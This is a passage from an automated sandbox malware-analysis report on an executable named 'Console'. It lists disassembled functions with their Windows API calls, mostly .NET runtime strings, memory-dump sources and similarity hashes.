                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,7CAB6A82,03C5A1B0,00000000), ref: 00FCE17F
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?,7CAB6A82,03C5A1B0,00000000), ref: 00FCE1D9
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?,7CAB6A82,03C5A1B0,00000000), ref: 00FCE219
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?,7CAB6A82,03C5A1B0,00000000), ref: 00FCE259
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?,7CAB6A82,03C5A1B0,00000000), ref: 00FCE296
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?,7CAB6A82,03C5A1B0,00000000), ref: 00FCE2D3
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?,7CAB6A82,03C5A1B0,00000000), ref: 00FCE316
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalDeleteSection$FreeHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 447823528-0
                                                                                                                                                                                                                          • Opcode ID: e24b96ffe102133723719bb4141fe5824bbbc5dbf6a198bc473faab1c2cb54de
                                                                                                                                                                                                                          • Instruction ID: c997731d71eada525bcb343a7720cf7d6bb17f3ffa6ed8f6dd7c93caf4b91c83
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e24b96ffe102133723719bb4141fe5824bbbc5dbf6a198bc473faab1c2cb54de
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C81C33090024AEFDB11DF64C94ABEEBBB8EF21704F00055CE441E7291D778AA59E7D1
                                                                                                                                                                                                                          Function 012CA2B0 Relevance: 10.8, APIs: 6, Strings: 1, Instructions: 343memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,01638748,03C2C320,03C2BED0), ref: 012CA4FC
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,01638748,03C2C320,03C2BED0), ref: 012CA5B7
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,01638748,03C2C320,03C2BED0), ref: 012CA65C
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,01638748,03C2C320,03C2BED0), ref: 012CA6A9
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,01638748,03C2C320,03C2BED0), ref: 012CA77C
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,01638748,03C2C320,03C2BED0), ref: 012CA79E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          • Opcode ID: ea725f7b821c16780f593f2c744ff40f0d1b27223bca64eb83b95881124509f9
                                                                                                                                                                                                                          • Instruction ID: e5d470d79aee0822f5c8c9fd5d6cb61e1e786acca08ea33b95ad9149e78fb9d2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea725f7b821c16780f593f2c744ff40f0d1b27223bca64eb83b95881124509f9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08E1AF74A1021D9FDF21CF28CC54BAAB7B9AF55700F4442EEEA09A7251E7309E94CF91
                                                                                                                                                                                                                          Function 012294B0 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 214memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 012295F0
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?), ref: 0122968A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: InprocServer32$SOFTWARE\Classes\
                                                                                                                                                                                                                          • API String ID: 3298025750-3520655855
                                                                                                                                                                                                                          • Opcode ID: dcd46c46c75a3041140b1681a8d10b0321c949615d18fb21372e4469059e3d84
                                                                                                                                                                                                                          • Instruction ID: 5b602cd80fab48abe3b349c7efe3d1e28599e9d57732cbd253efcc928792ba80
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dcd46c46c75a3041140b1681a8d10b0321c949615d18fb21372e4469059e3d84
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4DA16CB0914269EEEF20DF24CD49B9EBBB4AB01308F1042EDD64DA7290DB745E88CF55
                                                                                                                                                                                                                          Function 01185470 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 199memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000002, at,00000005,00000004,00000000,?,00000002), ref: 01185542
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000002), ref: 011855E6
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,00000002,0159BF18,?, ,?,00000002), ref: 01185666
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,01185300,?,00000009,00000000,00000002,0159BF18,?, ,?,00000002), ref: 011856A6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap$wcscpy_s
                                                                                                                                                                                                                          • String ID: $ at
                                                                                                                                                                                                                          • API String ID: 1983039323-3158221822
                                                                                                                                                                                                                          • Opcode ID: 3d374c9837d5c4ac40c3c6e5b396ab7fe341e5aa0bc2c3cd97a23bc245c21f19
                                                                                                                                                                                                                          • Instruction ID: 0feca8039282ec681a8f44f16b971cf10ad29b6dfc6b425d18edd00ea1f435f1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d374c9837d5c4ac40c3c6e5b396ab7fe341e5aa0bc2c3cd97a23bc245c21f19
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F71BEB1D00208AFEB19DF99ED85BEDBBB6FF44710F148129E811A7290DB746905CF90
                                                                                                                                                                                                                          Function 0115DBC0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 171threadCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,00650072,03C176F0,?,7CAB6A82), ref: 0115DBCE
                                                                                                                                                                                                                          • SleepEx.KERNEL32(00000001,00000000), ref: 0115DDC5
                                                                                                                                                                                                                          • SwitchToThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,014DD6C5,000000FF,?,0115F6C7,03C16300), ref: 0115DDCB
                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,7CAB6A82), ref: 0115DE03
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • RareDisablePreemptiveGC: entering. Thread state = %x, xrefs: 0115DC68
                                                                                                                                                                                                                          • RareDisablePreemptiveGC: leaving, xrefs: 0115DDEB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorLast$SleepSwitchThread
                                                                                                                                                                                                                          • String ID: RareDisablePreemptiveGC: entering. Thread state = %x$RareDisablePreemptiveGC: leaving
                                                                                                                                                                                                                          • API String ID: 490134931-73906953
                                                                                                                                                                                                                          • Opcode ID: 4a5c3ae9d1d17e4344c4f0cfecf7f68700d3fefd76de7f6d3131c4d0fd51a9c7
                                                                                                                                                                                                                          • Instruction ID: 4eabc654125bdcf12fdb48ef22ef50160293044c26c0ec7bd3e922f897efae98
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a5c3ae9d1d17e4344c4f0cfecf7f68700d3fefd76de7f6d3131c4d0fd51a9c7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C51C230200201CBEF6DDF9CEC94B697BA5AF41714F09405CEE295B2DADBB5A851CBA1
                                                                                                                                                                                                                          Function 0121A870 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000040,DOTNET_,7CAB6A82,93F80028,0000000A,?), ref: 0121A92F
                                                                                                                                                                                                                          • wcscat_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000040,015AEEFC), ref: 0121A947
                                                                                                                                                                                                                          • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000040,COMPlus_), ref: 0121AA0E
                                                                                                                                                                                                                          • wcscat_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000040,015AEEFC), ref: 0121AA21
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcscat_swcscpy_s
                                                                                                                                                                                                                          • String ID: COMPlus_$DOTNET_
                                                                                                                                                                                                                          • API String ID: 1337066035-1316173318
                                                                                                                                                                                                                          • Opcode ID: 161cd5e9bc82e561b5d80dd301f36ba59c27ea0ef919bf9f4e92130aa84de15e
                                                                                                                                                                                                                          • Instruction ID: 7f0659fd7a418dde4db2a6022ee3a4439327545c5e6c54224820f9fafc5a79e0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 161cd5e9bc82e561b5d80dd301f36ba59c27ea0ef919bf9f4e92130aa84de15e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34617BB1D122A99FEB21CF68C945BDEBBB8BF15700F0041DAD949A7281E7745B84CF81
                                                                                                                                                                                                                          Function 00FD7A90 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 145memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _swprintf.LIBCMT ref: 00FD7B1B
                                                                                                                                                                                                                          • _swprintf.LIBCMT ref: 00FD7B60
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,0150E144,0150E144,00000000,00000000,00000000), ref: 00FD7BFD
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • MVID mismatch between loaded assembly '%s' (MVID = %s) and an assembly with the same simple name embedded in the native image '%s' (MVID = %s), xrefs: 00FD7B9C
                                                                                                                                                                                                                          • MVID mismatch between loaded assembly '%s' (MVID = %s) and version of assembly '%s' expected by assembly '%s' (MVID = %s), xrefs: 00FD7BB2
                                                                                                                                                                                                                          • {%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}, xrefs: 00FD7B13, 00FD7B58
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _swprintf$FreeHeap
                                                                                                                                                                                                                          • String ID: MVID mismatch between loaded assembly '%s' (MVID = %s) and an assembly with the same simple name embedded in the native image '%s' (MVID = %s)$MVID mismatch between loaded assembly '%s' (MVID = %s) and version of assembly '%s' expected by assembly '%s' (MVID = %s)${%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}
                                                                                                                                                                                                                          • API String ID: 3104695220-1745357930
                                                                                                                                                                                                                          • Opcode ID: f163c484405587003a431ba1ed1fb970663e65c554c46d9e841d75b3f127f3d7
                                                                                                                                                                                                                          • Instruction ID: 4762a0edd1a2e33509940881539255616c20949e1104787f59cce13e177ff916
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f163c484405587003a431ba1ed1fb970663e65c554c46d9e841d75b3f127f3d7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD41B2B29002586ECB24DE999C05FFE7BECAB09611F14011AFD54E7281D638D900DBB0
                                                                                                                                                                                                                          Function 012D67D0 Relevance: 10.6, APIs: 7, Instructions: 79stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCommandLineW.KERNEL32(00000000,00000000,?,?,?,012D9EF0,?,00000000), ref: 012D67E7
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,03BF100E,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,012D9EF0,?,00000000), ref: 012D6809
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,012D9EF0,?,00000000), ref: 012D681B
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,03BF100E,000000FF,00000000,?,00000000,00000000), ref: 012D683C
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,012DAC36), ref: 012D6847
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000), ref: 012D685F
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,012DAC36), ref: 012D6882
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharMultiWidefree$CommandLinemallocstrcmp
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2300001080-0
                                                                                                                                                                                                                          • Opcode ID: d73027d0ccbb89c888602dfecf58fe8eafc7fc6de03f572df2151ffd5cae7e91
                                                                                                                                                                                                                          • Instruction ID: 6541ba1d4d77be2808f80750ce33caa882bb74a52c7448060cffbc8aff1c5ce5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d73027d0ccbb89c888602dfecf58fe8eafc7fc6de03f572df2151ffd5cae7e91
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C221EB796503226BEB325B59AC0BF177A699F40B21F16013CFB05F73D4EA50D41483D1
                                                                                                                                                                                                                          Function 01229A50 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 61registryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00000001,00000000,?,00000000,?,01418785,00000000,?,00FC0000,00000000,00FC0000), ref: 01229A72
                                                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(00000000,~MHz,00000000,00000000,?,00FC0000,?,01418785,00000000,?), ref: 01229A99
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,?,01418785,00000000,?), ref: 01229AB4
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,?,01418785,00000000,?), ref: 01229ACD
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 01229A63
                                                                                                                                                                                                                          • ~MHz, xrefs: 01229A91
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Close$OpenQueryValue
                                                                                                                                                                                                                          • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$~MHz
                                                                                                                                                                                                                          • API String ID: 1607946009-2226868861
                                                                                                                                                                                                                          • Opcode ID: 331ab3b0c5c4d02d966eb6b07edab660bcfc9b7e0b90cc767df140734165a9ca
                                                                                                                                                                                                                          • Instruction ID: 2efd5281f7d78839622891df28065c63ca93885ed8da568f29e1de82f1f52e42
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 331ab3b0c5c4d02d966eb6b07edab660bcfc9b7e0b90cc767df140734165a9ca
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3115176F0021CABCF10DA99DC45BEEB7B9EB88211F1001A6FA04F3350D670AE548B94
                                                                                                                                                                                                                          Function 012B9B00 Relevance: 9.4, APIs: 5, Strings: 1, Instructions: 373memoryCOMMON
